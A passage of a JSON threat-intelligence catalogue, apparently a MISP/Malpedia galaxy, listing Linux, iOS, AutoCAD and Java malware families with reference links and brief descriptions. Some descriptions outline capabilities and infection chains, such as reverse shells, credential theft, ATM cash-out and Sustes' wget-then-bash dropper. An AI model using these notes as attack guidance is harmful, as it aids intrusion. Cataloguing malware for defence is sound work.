"synonyms": [], "type": [] }, "uuid": "934478a1-1243-4c26-8360-be3d01ae193e", "value": "reptile" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex", "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/" ], "synonyms": [], "type": [] }, "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", "value": "Rex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rhombus", "https://old.reddit.com/r/LinuxMalware/comments/fh3zar/memo_rhombus_an_elf_bot_installerdropper/" ], "synonyms": [], "type": [] }, "uuid": "af886910-9a0b-478e-b53d-54c8a103acb4", "value": "RHOMBUS" }, { "description": "P2P Botnet discovered by Netlab360. The botnet infects linux servers via the Webmin RCE vulnerability (CVE-2019-15107) which allows attackers to run malicious code with root privileges and take over older Webmin versions. Based on the Netlabs360 analysis, the botnet serves mainly 7 functions: reverse shell, self-uninstall, gather process' network information, gather Bot information, execute system commands, run encrypted files specified in URLs and four DDoS attack methods: ICMP Flood, HTTP Flood, TCP Flood, and UDP Flood.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.roboto", "https://blog.netlab.360.com/the-awaiting-roboto-botnet-en", "https://www.zdnet.com/article/new-roboto-botnet-emerges-targeting-linux-servers-running-webmin" ], "synonyms": [], "type": [] }, "uuid": "e18bf514-b978-4bef-b4d9-834a5100fced", "value": "Roboto" }, { "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/", "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori", "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/" ], "synonyms": [], "type": [] }, "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0", "value": "Satori" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind", "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" ], "synonyms": [], "type": [] }, "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", "value": "ShellBind" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga", "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" ], "synonyms": [], "type": [] }, "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", "value": "Shishiga" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.silex", "https://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/" ], "synonyms": [ "silexbot" ], "type": [] }, "uuid": "bf059cb4-f73a-4181-bf71-d8da7bf50dd8", "value": "Silex" }, { "description": "According to FireEye, SLAPSTICK is a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.slapstick", "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html" ], "synonyms": [], "type": [] }, "uuid": "fb3e0a1d-3a98-4cbd-ad7f-4bbb4b9a8351", "value": "SLAPSTICK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", "https://cis.verint.com/2016/11/08/spamtorte-version-2/" ], "synonyms": [], "type": [] }, "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", "value": "Spamtorte" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.speakup", "https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/" ], "synonyms": [], "type": [] }, "uuid": "3ccd3143-c34d-4680-94b9-2cc4fa4f86fa", "value": "SpeakUp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.specter", "https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/" ], "synonyms": [], "type": [] }, "uuid": "b9ed5797-b591-4ca9-ba77-ce86308e333a", "value": "Specter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.speculoos", "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", "https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/" ], "synonyms": [], "type": [] }, "uuid": "df23ae3a-e10d-4c49-b379-2ea2fd1925af", "value": "Speculoos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", "https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/", "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" ], "synonyms": [], "type": [] }, "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", "value": "SSHDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/", "https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/", "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/", "https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/", "https://www.intezer.com/blog/research/stantinkos-proxy-after-your-apache-server/" ], "synonyms": [], "type": [] }, "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", "value": "Stantinko" }, { "description": "According to FireEye, STEELCORGI is a packer for Linux ELF files that makes use of execution guardrails by sourcing decryption key material from environment variables.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi", "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html", "https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/" ], "synonyms": [], "type": [] }, "uuid": "21ff33b5-ef21-4263-8747-7de3d2dbdde6", "value": "STEELCORGI" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sunless", "https://www.securityartwork.es/2019/01/09/analisis-de-linux-sunless/" ], "synonyms": [], "type": [] }, "uuid": "d03fa69b-53a4-4f61-b800-87e4246d2656", "value": "Sunless" }, { "description": "Sustes Malware doesn’t infect victims by itself (it’s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes", "https://marcoramilli.com/2018/09/20/sustes-malware-cpu-for-monero/" ], "synonyms": [], "type": [] }, "uuid": "5c117b01-826b-4656-b6ca-8b18b6e6159f", "value": "sustes miner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt", "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool", "https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/", "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" ], "synonyms": [], "type": [] }, "uuid": "24695f84-d3af-477e-92dd-c05c9536ebf5", "value": "TeamTNT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.themoon", "https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers", "https://www.sans.org/reading-room/whitepapers/malicious/analyzing-backdoor-bot-mips-platform-35902" ], "synonyms": [], "type": [] }, "uuid": "ed098719-797b-4cb3-a73c-65b6d08ebdfa", "value": "TheMoon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tntbotinger", "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html" ], "synonyms": [], "type": [] }, "uuid": "00319b53-e31c-4623-a3ac-9a18bc52bf36", "value": "TNTbotinger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii", "https://blog.avast.com/new-torii-botnet-threat-research" ], "synonyms": [], "type": [] }, "uuid": "a874575e-0ad7-464d-abb6-8f4b7964aa92", "value": "Torii" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot", "http://paper.seebug.org/345/" ], "synonyms": [], "type": [] }, "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", "value": "Trump Bot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tscookie", "https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html", "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", "https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf", "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" ], "synonyms": [], "type": [] }, "uuid": "592f7cc6-1e07-4d83-8082-aef027e9f1e2", "value": "TSCookie" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsh", "https://github.com/creaktive/tsh" ], "synonyms": [], "type": [] }, "uuid": "95a07de2-0e17-48a7-b935-0c1c0c0e39af", "value": "tsh" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", "https://blog.aquasec.com/fileless-malware-container-security", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "http://get.cyberx-labs.com/radiation-report", "https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/" ], "synonyms": [ "Amnesia", "Muhstik", "Radiation" ], "type": [] }, "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", "value": "Tsunami (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat" ], "synonyms": [], "type": [] }, "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", "value": "Turla RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon", "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" ], "synonyms": [ "Espeon" ], "type": [] }, "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", "value": "Umbreon" }, { "description": "According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in linux email servers. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiates a crypto miner.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_001", "https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability" ], "synonyms": [], "type": [] }, "uuid": "b5b59d9f-f9e2-4201-a017-f2bae0470808", "value": "Unidentified Linux 001" }, { "description": "Golang-based RAT that offers execution of shell commands and download+run capability. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_002", "https://labs.bitdefender.com/2020/10/theres-a-new-a-golang-written-rat-in-town/" ], "synonyms": [], "type": [] }, "uuid": "7c516b66-f4a4-406a-bf35-d898ac8bffec", "value": "Unidentified Linux 002" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", "https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html", "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", "https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf", "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html", "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/", "https://blog.talosintelligence.com/2018/05/VPNFilter.html", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware" ], "synonyms": [], "type": [] }, "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", "value": "elf.vpnfilter" }, { "description": "According to Intezer, this is a spreader module used by WatchBog. It is a dynamically linked ELF executable, compiled with Cython. C&C adresses are fetched from Pastebin. C&C communication references unique identification keys per victim. It contains a BlueKeep scanner, reporting positively scanned hosts to the C&C server (RC4 encrypted within SSL/TLS). It contains 5 exploits targeting Jira, Exim, Solr, Jenkins and Nexus Repository Manager 3. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.watchbog", "https://intezer.com/blog/linux/watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/" ], "synonyms": [], "type": [] }, "uuid": "aa00d8c9-b479-4d05-9887-cd172a11cfc9", "value": "WatchBog" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmail", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html" ], "synonyms": [], "type": [] }, "uuid": "93ffafbd-a8af-4164-b3ab-9b21e6d09232", "value": "WellMail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess", "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html", "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html", "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html" ], "synonyms": [], "type": [] }, "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", "value": "elf.wellmess" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti", "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a" ], "synonyms": [], "type": [] }, "uuid": "d6c5211e-506d-415c-b886-0ced529399a1", "value": "Winnti (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", "https://news.drweb.com/show/?i=2679&lng=en&c=14" ], "synonyms": [], "type": [] }, "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", "value": "Wirenet (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", "https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" ], "synonyms": [ "chopstick", "fysbis", "splm" ], "type": [] }, "uuid": "a8404a31-968a-47e8-8434-533ceaf84c1f", "value": "X-Agent (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe", "https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html" ], "synonyms": [], "type": [] }, "uuid": "55b4d75f-adcc-47df-81cf-6c93ccb54a56", "value": "Xanthe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc", "https://twitter.com/michalmalik/status/846368624147353601" ], "synonyms": [], "type": [] }, "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", "value": "Xaynnalc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xbash", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" ], "synonyms": [], "type": [] }, "uuid": "ee54fc1e-c574-4836-8cdb-992ac38cef32", "value": "Xbash" }, { "description": "Linux DDoS C&C Malware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf", "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/", "https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf", "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html", "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html", "https://en.wikipedia.org/wiki/Xor_DDoS", "https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/", "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/", "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html", "https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/", "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/" ], "synonyms": [ "XORDDOS" ], "type": [] }, "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", "value": "XOR DDoS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard", "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" ], "synonyms": [ "darlloz" ], "type": [] }, "uuid": "9218630d-0425-4b18-802c-447a9322990d", "value": "Zollard" }, { "description": "Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/fas.acad", "https://github.com/Hopfengetraenk/Fas-Disasm", "https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft" ], "synonyms": [ "Acad.Bursted", "Duxfas" ], "type": [] }, "uuid": "fb22d876-c6b5-4634-a468-5857088d605c", "value": "AutoCAD Downloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy", "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" ], "synonyms": [], "type": [] }, "uuid": "f7c1675f-b38a-4511-9ac4-6e475b3815e6", "value": "DualToy (iOS)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject", "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" ], "synonyms": [], "type": [] }, "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", "value": "GuiInject" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.lightspy", "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/", "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf" ], "synonyms": [], "type": [] }, "uuid": "8a1b524b-8fc9-4b1d-805d-c0407aff00d7", "value": "lightSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.poisoncarp", "https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/", "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" ], "synonyms": [ "INSOMNIA" ], "type": [] }, "uuid": "7982cc15-f884-40ca-8a82-a452b9c340c7", "value": "PoisonCarp" }, { "description": "The iOS malware that is installed over USB by osx.wirelurker", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" ], "synonyms": [], "type": [] }, "uuid": "bb340271-023c-4283-9d22-123317824a11", "value": "WireLurker (iOS)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.xagent", "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/" ], "synonyms": [], "type": [] }, "uuid": "430b9f30-5e37-49c8-b4e7-21589f120d89", "value": "X-Agent (iOS)" }, { "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", "https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", "https://blogs.seqrite.com/evolution-of-jrat-java-malware/", "https://research.checkpoint.com/malware-against-the-c-monoculture/", "http://malware-traffic-analysis.net/2017/07/04/index.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat", "https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/", "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/", "https://citizenlab.ca/2015/12/packrat-report/" ], "synonyms": [ "AlienSpy", "Frutas", "JBifrost", "JSocket", "Sockrat", "UNRECOM" ], "type": [] }, "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", "value": "AdWind" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adzok", "https://citizenlab.ca/2015/12/packrat-report/" ], "synonyms": [], "type": [] }, "uuid": "90cb8ee6-52e6-4d8d-8f45-f04b9aec1f6c", "value": "Adzok" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload", "https://colin.guru/index.php?title=Advanced_Banload_Analysis", "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload" ], "synonyms": [], "type": [] }, "uuid": "30a61fa9-4bd1-427d-9382-ff7c33bd7043", "value": "Banload" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.bluebanana", "https://www.virustotal.com/gui/file/60faab36491e07f10bf6a3ebe66ed9238459b2af7e36118fccd50583728141a4/community" ], "synonyms": [], "type": [] }, "uuid": "c51bbc9b-0906-4ac5-8026-d6b8b7b23e71", "value": "Blue Banana RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", "https://objective-see.com/blog/blog_0x28.html", "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" ], "synonyms": [ "Trupto" ], "type": [] }, "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", "value": "CrossRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.feimea_rat", "https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/" ], "synonyms": [], "type": [] }, "uuid": "3724d5d0-860d-4d1e-92a1-0a7089ca2bb3", "value": "FEimea RAT" }, { "description": "According to Karsten Hahn, this malware is actually written in JPHP, but can be treated similar to .class files produced by Java. IceRat has been observed to carry out information stealing and mining.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.icerat", "https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp" ], "synonyms": [], "type": [] }, "uuid": "ac83a481-2ab4-42c2-a8b6-a4aec96e1c4b", "value": "IceRat" }, { "description": "JavaDispCash is a piece of malware designed for ATMs. The compromise happens by using the JVM attach-API on the ATM's local application and the goal is to remotely control its operation. The malware's primary feature is the ability to dispense cash. The malware also spawns a local port (65413) listening for commands from the attacker which needs to be located in the same internal network.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash", "https://twitter.com/r3c0nst/status/1111254169623674882", "https://github.com/fboldewin/Libertad-y-gloria---A-Mexican-cyber-heist-story---CyberCrimeCon19-Singapore" ], "synonyms": [], "type": [] }, "uuid": "71286008-9794-4dcc-a571-164195390c39", "value": "JavaDispCash" }, { "description": "", "meta": { "refs": [ 